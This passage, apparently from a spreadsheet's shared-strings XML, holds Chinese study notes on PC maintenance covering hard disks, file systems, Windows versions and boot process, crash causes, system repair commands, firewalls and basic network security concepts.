    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 其它</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>总容量</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>转速</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>速度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据传输率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>缓存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁头数</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>尺寸大小</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>单碟容量*盘片数；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主轴电动机的转动速度，将所要存取资料的扇区带到磁头下方；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>平均寻道时间，柱面切换时间，全程寻道时间（反映磁头在各区域切换的速度）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a 内部；b 外部：电脑通过数据总线从硬盘内部缓存区读取数据的速度；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目前主流是8MB，16MB；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>盘片数*2；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.5in,2.5in,1.8in;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>盘片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">磁头 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>盘片主轴</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>控制电机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁头控制器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据转换器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IDE,SATA,SCSI,Fibre channel,USB,IEEE1394;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘的数据线路线设置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘分区、格式、文件系统；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘优化清理、查错、整理；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FAT文件分配表（File Allocation Table);</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DIR根目录区（Directory)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DATA数据区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a BPB(BIOS Parameter Block)本分区参数记录表；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FAT和DIR的组合相当于横纵坐标对点的定位，它可以对DATA数据区内的任何一个文件进行精确定位；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在windows操作系统中，用户可以轻而易举地删除一个文件，然后再把它从回收站清除，事实上只是对这个文件定位信息的清除，它仍然存在于数据区中，在没有被覆盖之前，可以利用软件进行恢复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统以进程为单元安排CPU的工作；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>以内存区块安排操作系统、驱动和进程的内存空间；（包括Cache，主存储器RAM，虚拟内存（硬盘分页文件））；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统通过驱动程序与硬件打交道，驱动为OS分离设计；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统管理输入输出：队伍与缓冲机制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统与应用程序交流：应用程序接口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统与用户交流：用户界面；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在多任务系统中，操作系统必须巧妙地安排应用程序的执行时间，让你感觉是好几件事在同时进行，操作系统必须每秒数千次在不同进程之间切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>覆盖安装：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装到全新的磁盘或已经格式化的分区上，采用全新安装方式装系统时，分区上的所有个人资料将全部丢失；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>全新安装：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>升级安装：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无人值守安装：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统克隆安装：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多系统共存安装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作系统的安装方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统配置和用户帐户配置：wondow3.x之前，每个应用软件及硬件设备为了设置自己的工作环境，都要建立。INI配置文件保存有关设置；从windows95开始，引入了注册表；%systemroot%\system32\config;或documents and setting\%wwu%;或%systemroot%\users\</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XP&amp;2000双系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTLDR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Biberfil.sys</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Boot.ini</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>生成多重启动菜单</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择OS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTDetect.com</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NTOSKRNL.EXE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BootMGR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Winload.exe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>winRusume</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Hiberfil.sys</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>vista&amp;XP双系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果上次以休眠方式关闭了vista;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>双系统启动顺序</t>
  </si>
  <si>
    <t>MS操作系统各版本介绍</t>
  </si>
  <si>
    <t>MS操作系统各版本介绍</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MS-DOS 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MS-DOS 6</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows第1代</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows第2代</t>
  </si>
  <si>
    <t>windows第3代</t>
  </si>
  <si>
    <t>windows第4代</t>
  </si>
  <si>
    <t>windows第5代</t>
  </si>
  <si>
    <t>windows第6代</t>
  </si>
  <si>
    <t>windows第7代</t>
  </si>
  <si>
    <t>相当一建立在MS-DOS平台上的应用软件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>加入了很多新的功能、组件和附件程序，如word\excel；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MS-DOS 6.22+windows 3.2是当时PC OS的黄金组合；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 首次引入任务栏、开始菜单、我的电脑、回收站等新界面元素；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 首次捆绑IE；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 内置IE 4、Direct X5(API接口）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 windows update 在线升级；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 通过了Active Desktop技术；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows2000</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 支持NTFS，IEEE1394；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 引入了帐户与权限的概念；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3自动为显卡和声卡配置了驱动；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows Me</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>需要启动盘才可以切换到DOS实模式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 IE 5,Direct X9;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 不同帐户同时登录；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 CD光盘记录；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 windows激活和正版验证；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>XP X64</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虽然PC的硬件已支持64位计算，但64位的应用软件和驱动还很少；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>vista</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows 7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE 7,Direct.10;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows95</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>window98</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 先启动MSDOS，然后执行WIN.COM命令；
2 16位OS；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 直接加载图形化的操作系统；
2 32位和16位混合模式的OS，图形化操作环境32位，底层的MS-DOS是16位；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>纯32位NT架构；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启动盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统自动恢复光盘</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>包含启动引导文件和系统备份文件，系统备份文件一般是系统所在硬盘分区的镜像文件，它可以使用Ghost工具制作，为了能自动执行系统恢复操作，需要在MS-DOS启动盘镜像的自动批处理文件“Autoexec.bat"中添加控制系统还原的Ghost命令；使用系统自动恢复光盘还原系统时，先通过引导文件启动计算机，接着自动运行autoexec.bat文件，并调用其中的Ghost命令，Ghost命令根据用户设定的参数，自动选择系统备份文件还原指定硬盘分区（一般为原系统所在分区）中的所有文件，从而将系统还原到备份时的状态；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是指启动电脑到DOS系统，并能使用DOS内部、外部命令的DOS平台；启动盘可以包含启动程序、磁盘分区、格式化程序、光盘驱动等程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows系统崩溃则不能进入人机对话（window系统采用图形化的窗口界面人机对话，且体积大，需要安装到硬盘，只能从硬盘启动），均而DOS则不然，DOS采用命令行模式的人机界面，体积小，从任何介质均可启动。所以当windows系统崩溃时，可以退而求其次；1 用启动盘从软盘启动，2 如用U盘做启动盘，则需主板支持U盘启动；3 如果用光盘做启动盘，则需将启动文件（DOS的四个核心文件+其它的一些DOS命令或DOS应用程序+一些驱动）；做成映像文件，如果启动盘启动后需访问光驱，则需在启动盘对应的文件中加载光盘驱动程序；
启动盘可下载专用工具制作或直接集成复制启动文件制作，NERO：新编辑---CD\dvd-rom---启动选项卡：映像文件---浏览；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高级启动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全模式:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修复PC:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络安全模式：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令提示符下的安全模式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启用系统日志：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启用低分辨率
（640*480）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>最近一次的正常配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>目录服务还原模式（服务器）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>调试模式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>禁用系统失败时自动重启</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>禁用强制驱动程序签名</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>正常启动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在纯DOS模式下杀毒</t>
  </si>
  <si>
    <t>很多病毒在刚启动时，在内在中是不可见的，而系统也会误认为他们是合法的程序而加以保护，这就造成了病毒无法清除；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在DOS模式下，连windows都没有启动，病毒就更不可能运行，因此这时查杀，就能绕过系统保护，达到干净杀毒的目的；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 利用启动光盘或DOS工具箱进入DOS；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 输入杀毒程序的路径后按Enter即可快速对系统进行杀毒；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>蓝屏并自动分析可能故障原因</t>
  </si>
  <si>
    <t>蓝屏并自动分析可能故障原因</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 认识蓝屏：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>a problem has been detected and windows has been shutdown to prevent damage to your computer;technical information:*** stop:0X000 0000A(错误名）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 设置自动保存“内存转存文件”功能：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机右击---属性---高级选项卡---启动和故障恢复：在“定稿高度信息”下拉菜单中选择“小内在转储”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 下载：分析“内存转储文件”的工具软件：Debugging Tools for Windows 32 bit v6.6.7.5</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 安装，启动上面工具软件---file---opencrash dump:打开内存转储文件）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>杀、控、防、优化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电脑死机原因种种</t>
  </si>
  <si>
    <t>风扇的灰尘过多或润滑不良：用手摸芯片或散热片是否烫手？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>板卡的插槽内有很多灰尘：造成散热不良；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装硬件或更新驱动后：硬件或驱动冲突，某些设备与系统不兼容，需卸载。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟内存所在硬盘分区空间太小：更换虚拟内存所在分区；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘严重老化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主板与CPU不匹配；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>劣质板卡，内存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>插件接触不良（因老化或灰尘太多，可拨下清洁后再插上）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存条不兼容，发生冲突；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存条松动或有进灰尘到插槽或内存条老化；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内存插槽变形或损坏；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内在容量不足；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BIOS设置不当；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机过热（给CPU换一个高性能的散热器）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>移动PC时，由于震动而引起PC内部器件松动而引起接触不良；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PC超频；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中毒造成PC的工作效率急剧下降；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>错删系统文件，系统文件损坏或杀毒后遗症；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件升级时可能对共享的一些组件也进行了升级，导致其他程序不支持；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试版软件通常有一些错误或不稳定；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>盗版软件拾病毒自动修改系统文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>启动程序太多造成个别程序需要的数据在内存或虚拟内存中找不到，系统会出现异常错误；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD下命令格式或参数使用不当；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不按正常方法关机造成系统文件损坏或丢失；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>注册表损坏；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>什么情况下适合修复系统而不是重装</t>
  </si>
  <si>
    <t>什么情况下适合修复系统而不是重装</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>引导文件丢失</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>操作不当，突然断电，病毒破坏，频繁安装或删除软件都可能造成引导文件丢失或损坏（无法进入系统）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统文件被非法替换</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统文件损坏</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统连不上网络</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统经常死机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>程序启动显示错误，无法启动</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统启动菜单丢失（多系统PC）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>驱动程序错误</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 Regsvr32手动注册DLL文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Regsvr32命令可用来向系统注册控件或删除控件，利用此命令可找回丢失的系统功能：Regsvr32 /u filename,其中filename是控件文件名称，不加参数u就是注册控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 不愿上一个驱动程序：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows的很多功能都有一个或多个控件对应，必须对控件进行注册才能实现对应的控件的功能，在安装OS时，各控件是自动注册完成的，但由于在使用过程中由于病毒入侵，系统故障或人为因素，导致部分控件丢失注册信息，所以部分功能出现故障；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>回滚驱动程序，除打印以外，只能一次；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 签名验证工具：sigverif</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>当安装新软件时，某些未验证或不兼容的版本会覆盖系统文件，导致系统产生不稳定的现象，利用此工具可以识别PC上未签名验证的系统文件并通知用户（楞用新的签名验证的文件去替换或其他方法）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 无法进入系统的修复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在光驱中插入与系统同一版本的安装光盘，把光驱设置为第一启动设备，在安装界面中单击左下角的“修复计算机链接文件，然后PC开始扫描系统分区，检查启动修复；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统修复的方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>从windows安装程序中提取系统文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>假设安装程序保存在D:\setup\目录下</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 XP：CMD:D:\SETUP\i386&gt;Expand NTOSKRNL.EX_NTOSKRNL.exe;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 vista:利用ImageX;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CMD:C:\&gt;ImageX /apply D:\Backup\E.WIM | E: /Verify;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 自启动程序</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 系统服务</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是操作系统一类特殊的应用程序，运行在后台，没有界面，为用户和需要相应系统服务的应用程序提供服务；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 进程</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是程序 内存中的一次运行，在window系统运行的进程中，可能包括系统文件，应用程序文件和恶意程序；一个应用程序可以触发一个或多个进程，操作系统控制并安排CPU运行的单元是进程而不是应用程序，在多任务系统中，OS必须巧妙地安排应用程序的执行时间，让你感觉是好几件事同时在进行，问题在于CPU在同一时间只能做一件事，为了看上去好像是很多事在同时进行，OS必须每秒数千次在不同进程之间切换；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是否有毒最关注的三大件</t>
  </si>
  <si>
    <t>是否有毒最关注的三大件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙</t>
  </si>
  <si>
    <t>是指控制应用程序（主要是通信程序）对内网和外网访问的控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    允许程序通过防火墙进行通信或撕开一个防火墙端口，就像在防火墙中打开了一个孔，您的防火墙拥有打开的程序或打开的端口越多，就是打开了一个端口或允许某个程序通过防火墙进行通信，这们，计算机的安全性会随之降低，黑客或恶意软件使用这些通道传播蠕虫，访问文件或使用计算机将恶意软件传播到其他计算机的机会越大。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    通常，将某个程序添加到其他允许的程序列表中比打开一个端口要安全得多，如果您打开一个端口，无论程序是否使用它，譔端口将始终保持打开状态，直到您将其关闭。如果将某个程序添加到允许的程序列表，该“孔”仅在需要特别通信时才打开；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬件防火墙：是指把防火墙程序写入到电脑的一些硬件里面，将防火墙的功能由定写入硬件的芯片执行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>防火墙</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络的安全性</t>
  </si>
  <si>
    <t>网络的安全性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 数据的安全性；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是一组程序和功能，用来阻止对数据的非授权的访问、转移、修改和破坏；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 通信的安全性</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>是一种保护措施：数据通信的加密，数据文件的加密；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 甲乙通信中可能存在的问题</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.1 丙是否知道？（信息泄露）（需加密机制）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.2 是乙吗？（识别）（需路由控制机制）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.3 乙被丙假冒？(假冒）（需数字签名机制）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.4 乙给甲发了一份报文如下：“请给丁江100元钱，乙”，报文在传输过程中经过了丙，丙篡改了报文成：“请给丙汇100元钱，乙”；（篡改）（需确保数据的完整性）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.5　甲放一份文件在网络中供乙使用，丙是否有使用？（同３.１）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.6 贴确认你是否是系统的合法帐户（同3.2）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3.7 恶意程序攻击；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4 安全性的层次</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.1 终端访问；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 帐号、密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 文件密码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.4 文件访问控制；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.5 网络用户验证；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.6 硬接线加密；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5 由内到外的安全防护</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.1 资源；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.2 系统冗余（备份）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.4 用户帐户；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.5 管理策略；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.6 网络操作系统；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.7 物理障碍层；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>5.3 资源访问权；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    电脑就像是一个按照严格规则进行的生产线，生产线上会有很多规定或有一般规律，这些，杀毒软件都已经心知肚明。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    病毒感染了文件以后就像是改变了生产的流程，而杀毒软件根据自己对生产线的了解，将被错误执行的生产线断开并让他正常工作，这是最完美的解决方法，称之为修复，有时也称之为消除病毒；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">    修复就是将感染了病毒的文件恢复正常，例如系统文件的代码出现了发动，杀毒软件再把它改回去，让错误执行的生产线恢复正常。这是杀毒软件最高级的操作，平时我们确认发现了病毒时，首先选择修复操作；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
